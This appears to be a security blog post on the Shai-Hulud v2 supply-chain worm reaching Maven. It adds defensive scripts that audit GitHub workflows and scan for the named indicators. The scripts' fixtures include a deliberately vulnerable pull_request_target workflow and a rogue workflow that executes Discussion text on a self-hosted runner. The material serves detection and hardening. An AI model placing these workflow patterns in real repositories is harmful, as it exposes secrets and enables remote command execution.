Cyber Web Spider Blog – News
Shai-Hulud v2 Campaign Spreads From npm to Maven, Exposing Thousands of Secrets

Posted on November 26, 2025 by CWS

The second wave of the Shai-Hulud supply chain attack has spilled over into the Maven ecosystem after compromising more than 830 packages in the npm registry.
The Socket Research Team said it identified a Maven Central package named org.mvnpm:posthog-node:4.18.1 that embeds the same two components associated with Sha1-Hulud: the "setup_bun.js" loader and the main payload, "bun_environment.js".
"This means the PostHog project has compromised releases in both the JavaScript/npm and Java/Maven ecosystems, driven by the same Shai Hulud v2 payload," the cybersecurity company said in a Tuesday update.
It is worth noting that the Maven Central package was not published by PostHog itself. Rather, the "org.mvnpm" coordinates are generated by an automated mvnpm process that rebuilds npm packages as Maven artifacts, so a trojanized npm release is mirrored into Maven Central without any human publisher in the loop. Maven Central said it is working to implement additional protections to prevent already-known compromised npm components from being rebundled. As of November 25, 2025, 22:44 UTC, all mirrored copies had been purged.
The development comes as the "second coming" of the supply chain incident has targeted developers globally with the aim of stealing sensitive data such as API keys, cloud credentials, and npm and GitHub tokens, and of facilitating deeper supply chain compromise in a worm-like fashion. The latest iteration has also evolved to be more stealthy, aggressive, scalable, and destructive.

Besides borrowing the overall infection chain of the initial September variant, the attack allows threat actors to gain unauthorized access to npm maintainer accounts and publish trojanized versions of their packages. When unsuspecting developers download and install these libraries, the embedded malicious code runs as an install-time script, backdoors their machines, scans for secrets, and exfiltrates them to GitHub repositories using the stolen tokens.
The attack accomplishes this by injecting two rogue workflows: one registers the victim machine as a self-hosted runner and enables arbitrary command execution every time a GitHub Discussion is opened; the second is designed to systematically harvest all secrets. Over 28,000 repositories have been affected by the incident.
"This version significantly enhances stealth by utilizing the Bun runtime to hide its core logic and increases its potential scale by raising the infection cap from 20 to 100 packages," Cycode's Ronen Slavin and Roni Kuznicki said. "It also uses a new evasion technique, exfiltrating stolen data to randomly named public GitHub repositories instead of a single, hard-coded one."

The attacks illustrate how trivial it is for attackers to take advantage of trusted software distribution pathways to push malicious versions at scale and compromise thousands of downstream developers. What's more, the self-replicating nature of the malware means a single infected account is enough to amplify the blast radius of the attack and turn it into a widespread outbreak in a short span of time.
Further analysis by Aikido has uncovered that the threat actors exploited misconfigurations in existing GitHub Actions workflows, specifically in jobs triggered by pull_request_target and workflow_run, to pull off the attack and compromise projects associated with AsyncAPI, PostHog, and Postman. Both triggers run with the base repository's secrets, so a job that checks out and executes code from an untrusted pull request under them hands those secrets to whoever opened the PR.
The vulnerability "used the risky pull_request_target trigger in a way that allowed code supplied by any new pull request to be executed within the CI run," security researcher Ilyas Makari said. "A single misconfiguration can turn a repository into a patient zero for a fast-spreading attack, giving an adversary the ability to push malicious code through automated pipelines you rely on every day."
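The two workflow patterns described above, the pull_request_target misconfiguration Aikido found and the injected Discussion-triggered self-hosted-runner workflow, can be triaged with a small audit script before a pull request ever reaches CI. The following is an added example, not code from Aikido, Cycode, or the Shai-Hulud payload. The three workflow files embedded in it are constructed fixtures, and the shape of the rogue runner workflow (an `on: discussion` trigger whose job runs on `self-hosted`) is assumed from the article's description rather than copied from the real injected file.

```python
"""Heuristic audit of GitHub Actions workflows for the two patterns above: a
pull_request_target/workflow_run job that executes pull-request code with the base
repo's secrets, and an injected Discussion-triggered self-hosted-runner workflow.
Regex-based, not a YAML parser (assumption: adequate for a first triage pass)."""
import re
import sys
from pathlib import Path

PRIVILEGED_TRIGGERS = ("pull_request_target", "workflow_run")  # run with base-repo secrets
UNTRUSTED_REF = re.compile(                                     # contributor-controlled code
    r"github\.event\.pull_request\.head\.(sha|ref)"
    r"|github\.event\.workflow_run\.head_(sha|branch)"
    r"|refs/pull/[^/\s]+/(merge|head)")
RUN_STEP = re.compile(r"^\s*-?\s*run\s*:", re.M)
SELF_HOSTED = re.compile(r"^\s*runs-on\s*:.*self-hosted", re.M)


def trigger_names(text: str) -> set:
    """Trigger names from `on: a`, `on: [a, b]` or the indented block form."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r"^on\s*:\s*(.*)$", line)
        if not m:
            continue
        if m.group(1).strip():                          # inline scalar or flow list
            return {t.strip() for t in m.group(1).strip("[] ").split(",") if t.strip()}
        names, indent = set(), None
        for nxt in lines[i + 1:]:                       # block form: keys at first indent level
            if not nxt.strip() or nxt.lstrip().startswith("#"):
                continue
            cur = len(nxt) - len(nxt.lstrip())
            if cur == 0:
                break
            indent = cur if indent is None else indent
            if cur == indent:
                key = nxt.split("#", 1)[0].strip()      # drop trailing comment
                names.add(key.lstrip("- ").rstrip(":").strip())
        return names
    return set()


def audit_workflow(text: str) -> list:
    """Return human-readable findings for one workflow file (empty list = clean)."""
    findings, triggers = [], trigger_names(text)
    privileged = [t for t in PRIVILEGED_TRIGGERS if t in triggers]
    if privileged and UNTRUSTED_REF.search(text) and RUN_STEP.search(text):
        findings.append(f"{'/'.join(privileged)}: checks out untrusted PR code and runs "
                        "it with base-repo secrets (pwn request)")
    if "discussion" in triggers and SELF_HOSTED.search(text):
        findings.append("discussion-triggered job on a self-hosted runner: matches the "
                        "injected runner workflow described in the article (assumed shape)")
    return findings


# Constructed fixtures, not real project files.
VULNERABLE_PR_TARGET = """\
name: PR checks
on:
  pull_request_target:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}   # contributor's commit
      - run: npm ci && npm test          # its install scripts run with NPM_TOKEN in scope
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
"""
HARDENED_PR_CHECK = """\
name: PR checks
on:
  pull_request:                    # unprivileged: no secrets, read-only token
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci --ignore-scripts && npm test
"""
ROGUE_DISCUSSION_RUNNER = """\
name: Discussion Create
on:
  discussion:
jobs:
  process:
    runs-on: self-hosted           # the backdoored developer machine
    steps:
      - run: ${{ github.event.discussion.body }}   # discussion text executed as a command
"""

if __name__ == "__main__":           # usage: python wf_audit.py .github/workflows/*.yml
    paths = [Path(p) for p in sys.argv[1:]]
    targets = {str(p): p.read_text(encoding="utf-8") for p in paths} or {
        "vulnerable": VULNERABLE_PR_TARGET, "hardened": HARDENED_PR_CHECK,
        "rogue": ROGUE_DISCUSSION_RUNNER}
    for name, text in targets.items():
        print(f"{name}: {audit_workflow(text) or 'no findings'}")
```

The hardened fixture shows the two changes that close the hole: switching to the unprivileged `pull_request` trigger (which gets no repository secrets and a read-only token for fork PRs) and adding `--ignore-scripts` so that a contributor-supplied package.json cannot run lifecycle hooks during `npm ci`. A regex pass like this will miss obfuscated or reusable-workflow indirection, so treat an empty result as "nothing obvious", not "clean".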

Users are advised to rotate all tokens and keys, audit all dependencies, remove compromised versions, reinstall clean packages, and harden developer and CI/CD environments with least-privilege access, secret scanning, and automated policy enforcement. Rotation should cover every credential that was present on an affected machine or in an affected CI job, not only the ones confirmed to have been uploaded.
"Sha1-Hulud is another reminder that the modern software supply chain is still way too easy to break," Dan Lorenc, co-founder and CEO of Chainguard, said. "A single compromised maintainer and a malicious install script is all it takes to ripple through thousands of downstream projects in a matter of hours."
"The techniques attackers are using are constantly evolving. Most of these attacks don't rely on zero-days. They exploit the gaps in how open source software is published, packaged, and pulled into production systems. The only real defense is changing the way software gets built and consumed."
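For the "audit all dependencies" step, the indicators this article names are concrete enough to check for offline: the setup_bun.js and bun_environment.js files inside an installed npm package, a lifecycle hook that launches them, and the org.mvnpm:posthog-node:4.18.1 coordinate in a Maven build. The script below is an added example, not a tool from Socket, Aikido, or any other vendor quoted here. When run without arguments it builds a constructed sample tree in a temporary directory (placeholder files stand in for the loader and payload; the npm package version in the fixture is made up) and scans it; given a project directory it scans that instead. It also goes one step beyond the page's single coordinate by reporting every `org.mvnpm` dependency for review, since those are all automated rebuilds of npm packages.

```python
"""Offline triage for the indicators named on this page: the setup_bun.js loader and
bun_environment.js payload dropped into npm packages, lifecycle scripts that launch them,
and the rebundled Maven artifact org.mvnpm:posthog-node:4.18.1.  Added example, not
tooling from Socket, Aikido or any other vendor quoted in the article."""
import json
import sys
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

IOC_FILES = ("setup_bun.js", "bun_environment.js")
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
MAVEN_IOCS = {("org.mvnpm", "posthog-node"): {"4.18.1"}}   # coordinate reported on the page


def scan_node_modules(root: Path) -> list:
    """Flag installed npm packages carrying the IOC files or a hook that runs them."""
    findings = []
    for pkg_json in sorted(root.rglob("package.json")):
        if "node_modules" not in pkg_json.parts:       # skip the project's own manifest
            continue
        pkg_dir = pkg_json.parent
        try:
            meta = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        reasons = []
        dropped = [f for f in IOC_FILES if (pkg_dir / f).is_file()]
        if dropped:
            reasons.append("ioc files present: " + ", ".join(dropped))
        scripts = meta.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:                    # hooks npm runs at install time
            cmd = str(scripts.get(hook, ""))
            if any(ioc in cmd for ioc in IOC_FILES):
                reasons.append(f"{hook} hook runs {cmd!r}")
        if reasons:
            findings.append({"package": meta.get("name", pkg_dir.name),
                             "version": meta.get("version", "?"),
                             "path": str(pkg_dir), "reasons": reasons})
    return findings


def scan_pom(pom: Path) -> list:
    """Flag the known-bad mvnpm coordinate as 'compromised' and every other
    org.mvnpm dependency (a rebundled npm package) as 'review'."""
    root = ET.parse(pom).getroot()
    ns = root.tag[:root.tag.index("}") + 1] if root.tag.startswith("{") else ""
    findings = []
    for dep in root.iter(f"{ns}dependency"):
        g = dep.findtext(f"{ns}groupId", "")
        a = dep.findtext(f"{ns}artifactId", "")
        v = dep.findtext(f"{ns}version", "")
        if v in MAVEN_IOCS.get((g, a), ()):
            status = "compromised"
        elif g == "org.mvnpm":
            status = "review"
        else:
            continue
        findings.append({"coordinate": f"{g}:{a}:{v or '<managed>'}", "status": status})
    return findings


def build_sample_tree(base: Path) -> None:
    """Constructed fixture: one trojanized package, one clean one, and a pom.xml."""
    bad = base / "node_modules" / "posthog-node"
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({
        "name": "posthog-node", "version": "0.0.0-constructed",   # made-up version
        "scripts": {"preinstall": "node setup_bun.js"}}))
    for ioc in IOC_FILES:                               # stand-ins, not the real loader/payload
        (bad / ioc).write_text("// constructed placeholder\n")
    good = base / "node_modules" / "left-pad"
    good.mkdir(parents=True)
    (good / "package.json").write_text(json.dumps({"name": "left-pad", "version": "1.3.0"}))
    (base / "pom.xml").write_text("""<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion><groupId>example</groupId>
  <artifactId>app</artifactId><version>1.0</version>
  <dependencies>
    <dependency><groupId>org.mvnpm</groupId><artifactId>posthog-node</artifactId>
      <version>4.18.1</version></dependency>
    <dependency><groupId>org.mvnpm</groupId><artifactId>left-pad</artifactId>
      <version>1.3.0</version></dependency>
    <dependency><groupId>org.apache.commons</groupId><artifactId>commons-lang3</artifactId>
      <version>3.14.0</version></dependency>
  </dependencies>
</project>""")


def run_demo() -> dict:
    """Scan the constructed fixture in a temporary directory; returns both result lists."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        build_sample_tree(base)
        return {"npm": scan_node_modules(base), "maven": scan_pom(base / "pom.xml")}


if __name__ == "__main__":                              # usage: python ioc_scan.py [project dir]
    if len(sys.argv) > 1:
        root = Path(sys.argv[1])
        results = {"npm": scan_node_modules(root),
                   "maven": scan_pom(root / "pom.xml") if (root / "pom.xml").is_file() else []}
    else:
        results = run_demo()
    print(json.dumps(results, indent=2))
```

A hit on the npm side means the install scripts have already run on that machine, so the response is the full rotation described above, not just `npm uninstall`. The `review` status on the Maven side is deliberately noisy: an org.mvnpm artifact is only as trustworthy as the npm release it was rebuilt from, which is exactly the gap Maven Central said it is working to close.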

Source: The Hacker News. Tags: Campaign, Exposing, Maven, NPM, Secrets, ShaiHulud, Spreads, Thousands

